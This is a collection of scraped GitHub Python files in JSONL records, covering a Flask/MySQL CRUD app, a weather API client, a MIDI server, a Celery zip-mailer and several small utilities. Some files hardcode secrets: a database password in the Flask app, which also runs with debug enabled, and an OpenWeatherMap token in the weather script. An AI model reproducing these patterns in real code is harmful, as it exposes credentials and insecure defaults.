= 0\r\n if type(i) is str:\r\n s = len(i)\r\n n += s\r\n print('Тип данных - кортеж')\r\n print('Длинна всех слов = ', n)\r\n\r\n# если тип объекта список - считаем количество чисел и букв\r\n if isinstance(xxx, list):\r\n k = 0 # буквы\r\n n = 0 # числа\r\n for i in xxx:\r\n if type(i) is str:\r\n for j in i:\r\n k += 1\r\n if type(i) is int:\r\n for j in str(i):\r\n n += 1\r\n print('Тип данных - список')\r\n print('Количество букв = ', k, 'количество цифр = ', n)\r\n\r\n\r\n# если тип объекта число (целое или дробное) - считаем количество нечетных чисел\r\n if (isinstance(xxx, int)) or (isinstance(xxx, float)):\r\n my_chislo = str(xxx)\r\n k = 0\r\n for i in my_chislo:\r\n if i.isdigit():\r\n if (int(i) / 2) != (int(i) // 2):\r\n k += 1\r\n print('тип данных - число')\r\n print('количество нечетных чисел - ', k)\r\n\r\n# если тип объекта сторока - считаем количество букв\r\n if isinstance(xxx, str):\r\n k = 0 # буквы\r\n for i in xxx:\r\n if i.isalpha():\r\n k += 1\r\n print('тип данных - сторока')\r\n print('Количество букв = ', k)\r\n\r\n# присваиваем объекту данные\r\nkkk = 'kla4ss 24 privet'\r\n\r\nidentify(kkk)\r\n","repo_name":"ssheshka/115_Group_SheshkaS","sub_path":"v2_home_.py","file_name":"v2_home_.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36528289519","text":"import os\nimport psutil\nfrom configobj import ConfigObj\n\nconfig = ConfigObj('/BLACKBOX/NetOpp/config/config.properties')\nvd = config.get('videosDirectory')\npathLog = config.get('pathLog')\ndu = int(config.get('diskUsage'))\n\nperAtual = int(psutil.disk_usage('/')[3])\n\nif perAtual > du:\n lines = open(pathLog, \"r\").readlines()\n cont = -1\n while perAtual > du:\n cont = cont + 1\n try:\n os.remove(lines[cont][:-1])\n except:\n pass\n perAtual = int(psutil.disk_usage('/')[3])\n videos = open(pathLog, \"w\")\n videos.writelines(lines[cont+1:])\n videos.close()","repo_name":"Garrocho/Net-Opp","sub_path":"BlackBox/verifica-espaco.py","file_name":"verifica-espaco.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"42017078375","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_mysqldb import MySQL\n\napp = Flask(__name__)\n\napp.config['MYSQL_HOST'] = 'localhost' \napp.config['MYSQL_USER'] = 'Reisita' \napp.config['MYSQL_PASSWORD'] = '1234' \napp.config['MYSQL_DB'] = 'database' \n\nmysql = MySQL(app)\n\nwith app.app_context():\n cur = mysql.connection.cursor()\n cur.execute('''\n CREATE TABLE IF NOT EXISTS usuarios (\n id INT AUTO_INCREMENT PRIMARY KEY,\n nombre VARCHAR(100) NOT NULL,\n email VARCHAR(120) UNIQUE NOT NULL,\n edad INT\n )\n ''')\n mysql.connection.commit()\n cur.close()\n\n \n@app.route('/')\ndef index():\n cur = mysql.connection.cursor()\n cur.execute('SELECT * FROM usuarios')\n usuarios = cur.fetchall()\n cur.close()\n return render_template('index.html', usuarios=usuarios)\n\n \n@app.route('/add', methods=['GET', 'POST'])\ndef add_user():\n if request.method == 'POST':\n nombre = request.form['nombre']\n email = request.form['email']\n edad = request.form['edad']\n cur = mysql.connection.cursor()\n cur.execute('INSERT INTO usuarios (nombre, email, edad) VALUES (%s, %s, %s)', (nombre, email, edad))\n mysql.connection.commit()\n cur.close()\n return redirect(url_for('index'))\n return render_template('add.html')\n\n@app.route('/edit/', methods=['GET', 'POST'])\ndef edit_user(user_id):\n cur = mysql.connection.cursor()\n cur.execute('SELECT * FROM usuarios WHERE id = %s', (user_id,))\n user = cur.fetchone()\n cur.close()\n\n if request.method == 'POST':\n nombre = request.form['nombre']\n email = request.form['email']\n edad = request.form['edad']\n cur = mysql.connection.cursor()\n cur.execute('UPDATE usuarios SET nombre = %s, email = %s, edad = %s WHERE id = %s', (nombre, email, edad, user_id))\n mysql.connection.commit()\n cur.close()\n return redirect(url_for('index'))\n return render_template('edit.html', user=user)\n\n@app.route('/delete/', methods=['POST'])\ndef delete_user(user_id):\n cur = mysql.connection.cursor()\n cur.execute('DELETE FROM usuarios WHERE id = %s', (user_id,))\n mysql.connection.commit()\n cur.close()\n return redirect(url_for('index'))\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"gavi2004/tarea_programacion","sub_path":"App/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"14417944680","text":"import dlib\nimport sys\nimport cv2\nimport imutils\nfrom imutils import face_utils\nimport os\nimport xml.etree.ElementTree as ET\n\n\nf1 = './NewImages8.xml'\nf = './Immmmmge.xml'\n\nf2 = './NewImages8Summ.xml'\n\ntree = ET.parse(f)\ntree2 = ET.parse(f1)\n\nroot = tree.getroot()\nroot2 = tree2.getroot()\n\nimages_root = root.find('images')\nimages_root2 = root2.find('images')\nimages_root3 = ET.Element('images')\n\n\n\np = len(images_root)\ni = 0\nfor i in range(p):\n image = images_root[i]\n l = False\n for box in image:\n j = 0\n p2 = len(images_root2)\n\n for j in range(p2):\n image2 = images_root2[j]\n if image.attrib['file'] == image2.attrib['file']:\n for box2 in image2:\n for part in box2:\n box.append(part)\n l = True\n break\n else:\n continue\n if l == True:\n images_root3.append(image)\n\ntree3 = ET.ElementTree(images_root3)\ntree3.write(f2)\n # images_root.append(mirror_images)\nprint('Success!')","repo_name":"charlynka/Facereader","sub_path":"face_recognize_server/Utils/CopyPredictorPoints.py","file_name":"CopyPredictorPoints.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"41118293012","text":"import requests\nimport matplotlib.pyplot as plt\nimport json\nurl = \"http://api.openweathermap.org/data/2.5/onecall\"\ntokken = \"2cce50cfca08d716b19f19de207fcca8\"\nall_datas = {}\ncity_lat_lon = {'tehran':[35.68,51.42], 'esfahan':[32.6539,51.6660], 'mashhad':[36.2605,59.6168]}\n\ndef make_query_for_lat_lon(lat, lon):\n return {\"lat\":lat, \"lon\":lon,\"appid\":tokken,\"exclude\":\"daily, minutely\", \"units\":\"metric\"}\n\n\nclass weather_situation(object):\n def __init__(self, response):\n self.__dict__ = json.loads(response)\n self.make_data_to_plot()\n def make_data_to_plot(self):\n for key, val in self.__dict__['current'].items():\n if key=='weather':\n continue\n if key not in all_datas:\n all_datas[key] = [val]\n else:\n all_datas[key].append(val)\n for i in self.__dict__['hourly']:\n for key, val in i.items():\n if key=='weather' or key=='visibility' or key=='clouds':\n continue\n if key not in all_datas:\n all_datas[key] = [val]\n else:\n all_datas[key].append(val)\n def time_zone(self):\n return self.__dict__['timezone']\nif __name__ == \"__main__\":\n while(1):\n print(\"we can only find city name included: tehran, esfahan, mashhad. for rest of city enter lat and lon of them\")\n state = input(\"if you want weather by city name enter 1 and if you want weather by lat & lon enter 2 and for exit enter e:\")\n if state == 'e':\n break\n if state == '1':\n city_name = input(\"enter city name:\")\n lat, lon = city_lat_lon[city_name]\n query_string = make_query_for_lat_lon(lat, lon)\n else:\n lat, lon = input(\"enter lat and lon:\").split()\n query_string = make_query_for_lat_lon(lat, lon)\n\n response = requests.request(\"GET\", url, params=query_string)\n data = weather_situation(response.text)\n\n parameter_to_plot = ['humidity', 'feels_like', 'temp']\n for i in parameter_to_plot:\n plt.plot(all_datas[i],'ro' )\n plt.plot(all_datas[i] )\n plt.xlabel('next hours')\n plt.ylabel(i)\n plt.title('time zone:'+data.time_zone())\n plt.show()\n\n all_datas.clear()\n\n\n","repo_name":"mraarabzadeh/web-data","sub_path":"weatherapi.py","file_name":"weatherapi.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70260351294","text":"import argparse\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport seaborn as sns\n\nfrom sklearn.preprocessing import (\n StandardScaler\n)\nfrom sklearn.manifold import (\n TSNE\n)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('EXVO Training')\n parser.add_argument(\n '--data-root', \n help='Path data has been extracted', \n required=True\n )\n parser.add_argument(\n '--results-root', \n help='Path where results are to be stored', \n required=True\n )\n parser.add_argument(\n '--all-checkpoints',\n default=False,\n action='store_true'\n )\n args = parser.parse_args()\n\n df = pd.read_csv(os.path.join(args.data_root, 'data_info.csv'))\n df['file'] = df['File_ID'].apply(lambda x: x.strip('[').strip(']') + '.wav')\n df.set_index('file', inplace=True)\n df_train = df.loc[df['Split'] == 'Train']\n df_dev = df.loc[df['Split'] == 'Val']\n df_test = df.loc[df['Split'] == 'Val']\n\n embeddings = [os.path.join(args.results_root, 'state_exemplar_embeddings.npy')]\n if args.all_checkpoints:\n embeddings += [\n os.path.join(args.results_root, '_exemplar_embeddings.npy')\n ] + glob.glob(os.path.join(args.results_root, '**/state_exemplar_embeddings.npy'))\n \n for emb in embeddings:\n codename = os.path.basename(emb).split('.')[0]\n if not os.path.exists(os.path.join(os.path.dirname(emb), f'{codename}_tsne.csv')):\n mapped_emb = TSNE(2).fit_transform(StandardScaler().fit_transform(np.load(emb)))\n data = pd.DataFrame(\n data=mapped_emb,\n index=df_test.index,\n columns=['TSNE_1', 'TSNE_2']\n )\n data['Subject_ID'] = df_test['Subject_ID']\n data['Country'] = df_test['Country_string']\n data.to_csv(os.path.join(os.path.dirname(emb), f'{codename}_tsne.csv'))\n else:\n data = pd.read_csv(os.path.join(os.path.dirname(emb), f'{codename}_tsne.csv'))\n data.set_index('file', inplace=True)\n\n data['Country'] = df_test['Country_string']\n plt.figure()\n sns.scatterplot(\n data=data,\n x='TSNE_1',\n y='TSNE_2',\n hue='Country',\n s=10,\n palette=\"tab10\"\n )\n plt.title('Country')\n plt.tight_layout()\n plt.savefig(os.path.join(os.path.dirname(emb), f'{codename}_tsne_country.png'))\n plt.close()\n\n plt.figure()\n g = sns.scatterplot(\n data=data,\n x='TSNE_1',\n y='TSNE_2',\n hue='Subject_ID',\n s=10\n )\n g.legend_.remove()\n plt.title('Subject_ID')\n plt.tight_layout()\n plt.savefig(os.path.join(os.path.dirname(emb), f'{codename}_tsne_speaker.png'))\n plt.close()","repo_name":"ATriantafyllopoulos/exvo-eihw-personalisation","sub_path":"embedding_visualisation.py","file_name":"embedding_visualisation.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"21195644468","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom qt import QMutex, SIGNAL\nfrom kdecore import i18n\n\nimport dbus\nimport dbus.mainloop.qt3\n\nfrom handler import CallHandler\n\nclass ComarIface:\n \"\"\" Comar Interface to communicate with Comar \"\"\"\n def __init__(self, handler=None, errHandler=None):\n self.errHandler = errHandler\n self.handler = handler\n # package-manager sync\n self.com_lock = QMutex()\n if self.setupBusses():\n self.setupSignals()\n else:\n self.errHandler()\n return\n\n def setupBusses(self):\n try:\n # get system and session busses\n self.sysBus = dbus.SystemBus()\n self.sesBus = dbus.SessionBus()\n except dbus.DBusException:\n self.errHandler(i18n(\"Cannot connect to dbus\"))\n return False\n return True\n\n def setupSignals(self):\n self.sysBus.add_signal_receiver(self.handleSignals, dbus_interface=\"tr.org.pardus.comar.System.Manager\", member_keyword=\"signal\", path_keyword=\"path\")\n\n def handleSignals(self, *args, **kwargs):\n signal = kwargs[\"signal\"]\n if self.handler:\n self.handler(signal, args)\n\n def busError(self, exception):\n message = i18n(\"D-Bus Error\") + str(exception)\n self.setupBusses()\n self.errHandler(message)\n\n def comarAuthError(self, exception):\n self.errHandler(i18n(\"COMAR Auth Error\") + str(exception))\n\n def comarError(self, exception):\n message = \"\"\n if not \"urlopen error\" in exception.message:\n message += i18n(\"COMAR Error\")\n self.errHandler(message + \"
    \" + str(exception))\n\n def cancelError(self):\n message = i18n(\"You are not authorized for this operation.\")\n self.errHandler(message)\n\n def callMethod(self, method, action, handler, handleErrors, *args):\n ch = CallHandler(\"System.Manager\", method, action, self.sysBus, self.sesBus)\n\n if handleErrors:\n ch.registerError(self.comarError)\n ch.registerAuthError(self.comarAuthError)\n ch.registerDBusError(self.busError)\n ch.registerCancel(self.cancelError)\n if handler:\n ch.registerDone(handler)\n\n ch.call(*args)\n\n def takeSnapshot(self):\n self.com_lock.lock()\n self.callMethod(\"takeSnapshot\", \"tr.org.pardus.comar.system.manager.takesnapshot\", self.handler, True)\n\n def takeBack(self, operation):\n self.com_lock.lock()\n self.callMethod(\"takeBack\", \"tr.org.pardus.comar.system.manager.takeback\", None, True, int(operation))\n\n def cancel(self):\n obj = self.sysBus.get_object(\"tr.org.pardus.comar\", \"/\", introspect=False)\n obj.cancel(dbus_interface=\"tr.org.pardus.comar\")\n\n","repo_name":"pisilinux/uludag","sub_path":"branches/kde/history-manager/2008/src/ComarIface.py","file_name":"ComarIface.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"39050715974","text":"from os import F_OK\nfrom ..utils import decode_jwt, send_json\nfrom ..models import User\nfrom ..decorators import login_required\nfrom ..responses import userDoesNotExist, ok, no\nfrom django.views import View\n\nclass IsAdminView(View):\n @login_required\n def get(self, request):\n session = request.session\n decoded = decode_jwt(session)\n userid = decoded['userid']\n found = User.objects.filter(id=userid)\n if found.count() != 1:\n return send_json(userDoesNotExist)\n user = found[0]\n if user.isAdmin:\n data = ok\n else:\n data = no\n return send_json(data)\n","repo_name":"DPS0340/DjangoCRUDBoard","sub_path":"board/views/isAdmin.py","file_name":"isAdmin.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"78"} +{"seq_id":"5972423371","text":"\"\"\"\nAlfred Gachanja\n27-07-2023\nIn this program I am using a function to print a list of my friends.\n\"\"\"\n\ndef show_friends(friends):\n print(\"This is a list of all my friends.\")\n for friend in friends:\n print(\"\\t{}\" .format(friend.title()))\n\nfriends = ['bill', 'davis', 'eric', 'kelvin', 'sandra', 'binzare']\nshow_friends(friends)","repo_name":"Alfredchanja/Python_Scripts","sub_path":"Part_1/Chapter_8/Friends.py","file_name":"Friends.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75099731453","text":"#!/usr/bin/python3\n\nimport time\nimport mido\nimport os\nimport subprocess\nimport re\nimport requests\nimport sys\n\nimport asyncio\nimport websockets\n\n# midi device naming; avoid spaces\nname = \"MidiCmdServer2\"\n\n# system command to set up the midi thru port\n# TODO would be nice to do this in python, but\n# rtmidi has issues seeing ports it has created\n#os.system(runCmd)\namidiProc = subprocess.Popen(['amidithru', name])\n\n# regex to match on rtmidi port name convention\nnameRegex = \"(\" + name + \":\" + name + \"\\s+\\d+:\\d+)\"\nmatcher = re.compile(nameRegex)\nnewList = list(filter(matcher.match, mido.get_input_names()))\ninput_name = newList[0]\n\n# Parse list of AMSythn preset names to map to CC control values\npresets = [line.rstrip('\\n') for line in open('/home/patch/presetmap.txt')]\n\n# Used to avoid resending of duplicates as there seems to be multiple MIDI requests come through\nlastPresets = [ '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '' ]\n\n# Websocket class. Makes (and restores) a single connection for multiple socket requests\nclass WebSocket:\n __ws = None\n __url = \"ws://patchbox.local/websocket\"\n\n def __init__(self):\n self.retryTime = 0\n self.retryRepeat = 30\n self.__create_connect()\n\n @asyncio.coroutine\n def __create_connect(self):\n if self.__ws is None:\n if (time.time() - self.retryTime) > self.retryRepeat:\n try:\n self.__ws = yield from websockets.connect(self.__url)\n self.retryTime = 0\n except ConnectionRefusedError:\n self.retryTime = time.time()\n\n def connect(self):\n if self.__ws is None:\n asyncio.get_event_loop().run_until_complete(self.__create_connect())\n\n def send(self, msg):\n if self.__ws is not None:\n try:\n asyncio.get_event_loop().run_until_complete(self.__async_send(msg))\n except ConnectionRefusedError:\n self.__create_connect()\n else:\n asyncio.get_event_loop().run_until_complete(self.__create_connect())\n\n async def __async_send(self, message):\n await self.__ws.send(message)\n\n# Simple function for GET requests\ndef get(URL, PARAMS):\n global session\n return session.get(url = URL, params = PARAMS)\n\n# keep running and watch for midi cc\nwhile True:\n\n # Establish a web session for GET requests\n session = requests.Session()\n print(\"Session setup\")\n # Establish a websocket connection\n # NOTE: needed to call .connect manually as it doesn't seem to connect through the __init__\n socket = WebSocket()\n socket.connect()\n print(\"socket connected\")\n\n try:\n # set up backend\n mido.set_backend('mido.backends.rtmidi')\n \n with mido.open_input(input_name) as inport:\n print(\"Connected to rtmidi backend\")\n\n # Process the MIDI messages received\n for msg in inport:\n if msg.type == \"control_change\":\n # TouchOSC CH16 - on/off for AMSynth Instrument preset GET requests\n if msg.channel == 15 and msg.value == 127 and lastPresets[15] != msg.control:\n r = get( 'http://patchbox.local/effect/preset/load/graph/amsynth_1', {'uri':'http://code.google.com/p/amsynth/amsynth#' + presets[msg.control]} )\n lastPresets[15] = msg.control\n\n # TouchOSC CH15 - FluidDrums preset selection by program number - uses websocket\n if msg.channel == 14 and lastPresets[14] != msg.control:\n cmd = \"param_set \" + \"/graph/FluidPlug_FluidDrums/program \" + str(msg.control)\n socket.send( cmd )\n lastPresets[14] = msg.control\n break\n except KeyboardInterrupt:\n print(\"BYE!!!!\")\n break\n except:\n # If unable to connect to rtmidi backend\n # (which sometimes happens when starting), retry after 2 secs\n print(\"Retrying to connect to rtmidi backend\")\n time.sleep(2)\n","repo_name":"Greg209/patchbox-modep-stuff","sub_path":"midi_cmd_server.py","file_name":"midi_cmd_server.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"19547753230","text":"from __future__ import absolute_import\n\nfrom PyQt4.QtGui import QDialog\nfrom PyQt4.QtGui import QGridLayout\nfrom PyQt4.QtGui import QLabel\nfrom PyQt4.QtGui import QLineEdit\nfrom PyQt4.QtGui import QPlainTextEdit\nfrom PyQt4.QtGui import QComboBox\nfrom PyQt4.QtGui import QIcon\nfrom PyQt4.QtGui import QFileDialog\nfrom PyQt4.QtGui import QPushButton\nfrom PyQt4.QtGui import QHBoxLayout\nfrom PyQt4.QtGui import QMessageBox\nfrom PyQt4.QtCore import SIGNAL\n\nfrom ninja_ide.tools import manage_files\nfrom ninja_ide.tools import loader\nfrom ninja_ide import resources\nfrom ninja_ide.extras.plugins import TextProjectType\n\n\nclass ProjectProperties(QDialog):\n\n def __init__(self, parent, item):\n QDialog.__init__(self, parent)\n self.setModal(True)\n self._item = item\n self.setWindowTitle('Project Properties')\n grid = QGridLayout(self)\n grid.addWidget(QLabel('Name:'), 0, 0)\n self.name = QLineEdit()\n if self._item.name == '':\n self.name.setText(manage_files.get_basename(self._item.path))\n else:\n self.name.setText(self._item.name)\n grid.addWidget(self.name, 0, 1)\n grid.addWidget(QLabel('Project Type:'), 1, 0)\n self.txtType = TextProjectType()\n self.txtType.setText(self._item.projectType)\n grid.addWidget(self.txtType, 1, 1)\n grid.addWidget(QLabel('Description:'), 2, 0)\n self.description = QPlainTextEdit()\n self.description.setPlainText(self._item.description)\n grid.addWidget(self.description, 2, 1)\n grid.addWidget(QLabel('URL:'), 3, 0)\n self.url = QLineEdit()\n self.url.setText(self._item.url)\n grid.addWidget(self.url, 3, 1)\n grid.addWidget(QLabel('Licence:'), 4, 0)\n self.cboLicense = QComboBox()\n self.cboLicense.addItem('Apache License 2.0')\n self.cboLicense.addItem('Artistic License/GPL')\n self.cboLicense.addItem('Eclipse Public License 1.0')\n self.cboLicense.addItem('GNU General Public License v2')\n self.cboLicense.addItem('GNU General Public License v3')\n self.cboLicense.addItem('GNU Lesser General Public License')\n self.cboLicense.addItem('MIT License')\n self.cboLicense.addItem('Mozilla Public License 1.1')\n self.cboLicense.addItem('New BSD License')\n self.cboLicense.addItem('Other Open Source')\n self.cboLicense.addItem('Other')\n self.cboLicense.setCurrentIndex(4)\n index = self.cboLicense.findText(self._item.license)\n self.cboLicense.setCurrentIndex(index)\n grid.addWidget(self.cboLicense, 4, 1)\n grid.addWidget(QLabel('Main File:'), 5, 0)\n self.path = QLineEdit()\n self.path.setText(self._item.mainFile)\n self.path.setReadOnly(True)\n self.btnBrowse = QPushButton('Browse')\n hbox = QHBoxLayout()\n hbox.addWidget(self.path)\n hbox.addWidget(self.btnBrowse)\n grid.addLayout(hbox, 5, 1)\n\n self.txtExtensions = QLineEdit()\n self.txtExtensions.setText(str(', '.join(self._item.extensions)))\n grid.addWidget(QLabel('Supported Extensions:'), 6, 0)\n grid.addWidget(self.txtExtensions, 6, 1)\n\n self.txtPythonPath = QLineEdit()\n self.txtPythonPath.setText(self._item.pythonPath)\n self.btnPythonPath = QPushButton(QIcon(resources.images['open']), '')\n grid.addWidget(QLabel('Python Path:'), 7, 0)\n grid.addWidget(self.txtPythonPath, 7, 1)\n grid.addWidget(self.btnPythonPath, 7, 2)\n\n self.btnSave = QPushButton('Save')\n self.btnCancel = QPushButton('Cancel')\n hbox3 = QHBoxLayout()\n hbox3.addWidget(self.btnCancel)\n hbox3.addWidget(self.btnSave)\n grid.addLayout(hbox3, 8, 1)\n\n self.connect(self.btnBrowse, SIGNAL(\"clicked()\"), self.select_file)\n self.connect(self.btnCancel, SIGNAL(\"clicked()\"), self.close)\n self.connect(self.btnSave, SIGNAL(\"clicked()\"), self.save_properties)\n self.connect(self.btnPythonPath, SIGNAL(\"clicked()\"), self._load_python_path)\n\n def _load_python_path(self):\n path = str(QFileDialog.getOpenFileName(self, 'Select Python Path'))\n self.txtPythonPath.setText(path)\n\n def select_file(self):\n fileName = str(QFileDialog.getOpenFileName(self, 'Select Main File',\n self._item.path, '(*.py);;(*.*)'))\n if fileName != '':\n fileName = manage_files.convert_to_relative(self._item.path, fileName)\n self.path.setText(fileName)\n\n def save_properties(self):\n if str(self.name.text()).strip() == '':\n QMessageBox.critical(self, 'Properties Invalid', 'The Project must have a name.')\n return\n tempName = self._item.name\n self._item.name = str(self.name.text())\n self._item.description = str(self.description.toPlainText())\n self._item.license = str(self.cboLicense.currentText())\n self._item.mainFile = str(self.path.text())\n self._item.url = str(self.url.text())\n self._item.projectType = str(self.txtType.text())\n self._item.pythonPath = str(self.txtPythonPath.text())\n extensions = str(self.txtExtensions.text()).split(', ')\n self._item.extensions = tuple(extensions)\n #save project properties\n project = {}\n project['name'] = self._item.name\n project['description'] = self._item.description\n project['url'] = self._item.url\n project['license'] = self._item.license\n project['mainFile'] = self._item.mainFile\n project['project-type'] = self._item.projectType\n project['supported-extensions'] = self._item.extensions\n project['pythonPath'] = self._item.pythonPath\n if tempName != self._item.name and \\\n manage_files.file_exists(self._item.path, tempName + '.nja'):\n manage_files.delete_file(self._item.path, tempName + '.nja')\n loader.create_ninja_project(self._item.path, self._item.name, project)\n self._item.setText(0, self._item.name)\n self._item.setToolTip(0, self._item.name)\n if self._item.extensions != manage_files.supported_extensions:\n self._item._parent._refresh_project(self._item)\n self.close()\n","repo_name":"aztli/Traducciones","sub_path":"Ninja/ninja_ide/gui/qt/properties_panel/project_properties.py","file_name":"project_properties.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"34283070198","text":"import os\nimport urllib3\nimport zipfile\nimport tempfile\nfrom celery import task\nfrom django.conf import settings\nfrom django.template import Context\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import get_template\n\n\n@task\ndef email_zip(emails, errors, zipfile):\n \"\"\"\n Accepts emails, error log dict and zipfile path and send an\n emails to provided emails with zip as an attachment.\n \"\"\"\n recipient = []\n for email in emails.split(','):\n recipient.append(email)\n msg = EmailMessage(\n 'Html Files Zip - Assignment', 'ErrorLog: \\n' + str(errors), settings.EMAIL_HOST_USER, to=[] + recipient\n )\n msg.attach_file(zipfile, mimetype='application/octet-stream')\n msg.send()\n os.remove(zipfile)\n\n\n@task\ndef download_url_as_html(urls, emails):\n \"\"\"\n Accepts urls and emails lists and download html from provided urls\n and create zip file of html files.\n \"\"\"\n errors = {}\n with tempfile.NamedTemporaryFile(suffix='_%s' % 'urls_html.zip', delete=False) as tmp:\n with zipfile.ZipFile(tmp.name, 'w') as htmlzip:\n for url in urls.split(','):\n try:\n conn = urllib3.connection_from_url(url)\n content = conn.request('GET', '/', assert_same_host=False)\n except Exception as e:\n errors.update({url: str(e.reason)})\n continue\n domain = url.split('//')\n fp = tempfile.NamedTemporaryFile(\n prefix='%s_' % domain[1] if domain[1] else domain[0])\n fp.write(content._body)\n htmlzip.write(fp.name)\n fp.close()\n email_zip.delay(emails, errors, tmp.name)\n return {}\n","repo_name":"rinkurajole/URLDownloader","sub_path":"src/urldownloader/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39683578688","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\ndef data_load(path_raw_data, test_size, random_state,\n path_save_train, path_save_test):\n data = pd.read_csv(path_raw_data)\n data = data.dropna()\n work_type_data = pd.get_dummies(data['work_type'], prefix='work')\n smoking_status = pd.get_dummies(data['smoking_status'], prefix='smoking')\n data_prepared = data[['gender', 'age', 'hypertension', 'heart_disease', 'ever_married', 'avg_glucose_level', 'bmi']]\n data_prepared = pd.concat([data_prepared, work_type_data, smoking_status], axis=1).drop(columns=['smoking_Unknown'])\n data_prepared['gender'] = data_prepared['gender'].map(lambda x: int(x == 'Male'))\n data_prepared['ever_married'] = data_prepared['ever_married'].map(lambda x: int(x == 'Yes'))\n data_prepared['stroke'] = data['stroke']\n train, test = train_test_split(data_prepared, test_size=test_size,\n random_state=random_state)\n train.to_csv(path_save_train)\n test.to_csv(path_save_test)\n return train, test\n","repo_name":"TstGH/MLProd_tst","sub_path":"ml_project/src/data/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18976176645","text":"import plotly.plotly as py\nimport plotly.graph_objs as go\nimport plotly\nimport plotly.io as pio\nimport colorlover as cl\nfrom collections import defaultdict\nfrom csv import DictReader\n\ndef save_figure(fn, fig):\n plotly.offline.plot(fig, filename=fn + '.html', auto_open=False, show_link=True)\n pio.write_image(fig, fn + '.png')\n pio.write_image(fig, fn + '.pdf')\n\nfn = \"E:/YandexDisk/Work/pydnameth/draft/fisher/GSE87571/betas/v6/Relation_to_UCSC_CpG_Island.csv\"\n\ntable_dict = defaultdict(list)\nwith open(fn, 'r') as f:\n reader = DictReader(f)\n for row in reader:\n for col, dat in row.items():\n table_dict[col].append(dat)\n\n#x_data = [('chr' + str(x)) for x in table_dict['CHR']]\nx_data = table_dict['Relation_to_UCSC_CpG_Island']\ny_data = list(map(float, table_dict['OR']))\n\nless_ids = [id for id in range(0, len(y_data)) if y_data[id] < 1]\nmore_ids = [id for id in range(0, len(y_data)) if y_data[id] >= 1]\n\ntraces = []\nfor id in range(0, len(y_data)):\n if y_data[id] < 1.0:\n trace = go.Bar(\n x=[x_data[id]],\n y=[1 - y_data[id]],\n base=[y_data[id]],\n marker=dict(\n color='rgba(55, 128, 191, 0.7)',\n line=dict(\n color='rgba(55, 128, 191, 1.0)',\n width=2,\n )\n )\n )\n else:\n trace = go.Bar(\n x=[x_data[id]],\n y=[y_data[id] - 1.0],\n base=[1.0],\n marker=dict(\n color='rgba(55, 128, 191, 0.7)',\n line=dict(\n color='rgba(55, 128, 191, 1.0)',\n width=2,\n )\n )\n )\n traces.append(trace)\n\nlayout = go.Layout(\n showlegend=False,\n yaxis=dict(\n title='Odds ratio',\n type='log',\n autorange=True,\n showgrid=True,\n showline=True,\n mirror='ticks',\n titlefont=dict(\n family='Arial',\n size=33,\n color='black'\n ),\n showticklabels=True,\n tickangle=0,\n tickfont=dict(\n family='Arial',\n size=30,\n color='black'\n ),\n exponentformat='e',\n showexponent='all',\n tickvals=[0.001, 0.002, 0.005, 0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1, 2, 5, 10],\n #tickvals=[0.4, 0.06, 0.8, 1.0, 1.4, 1.8, 2.2, 2.6],\n #ticktext=['One', 'Three', 'Five', 'Seven', 'Nine', 'Eleven']\n ),\n xaxis=dict(\n autorange=True,\n showgrid=True,\n showline=True,\n mirror='ticks',\n tickangle=90,\n titlefont=dict(\n family='Arial',\n size=20,\n color='black'\n ),\n showticklabels=True,\n tickfont=dict(\n family='Arial',\n size=20,\n color='black'\n ),\n exponentformat='e',\n showexponent='all',\n ),\n autosize=True,\n margin=go.layout.Margin(\n l=120,\n r=20,\n b=120,\n t=20,\n pad=0\n ),\n barmode='overlay',\n)\n\nfig = go.Figure(data=traces, layout=layout)\n#py.plot(fig, filename='waterfall-bar-profit')\n\nsave_figure('barplot', fig)","repo_name":"GillianGrayson/dna-methylation","sub_path":"dna-methylation/routines/first_paper/barplot.py","file_name":"barplot.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28286323071","text":"import tensorflow as tf\r\nimport math\r\n\r\n\r\ndef build_t_model(trajectories):\r\n \"\"\"\r\n Function to build a subgraph\r\n \"\"\"\r\n 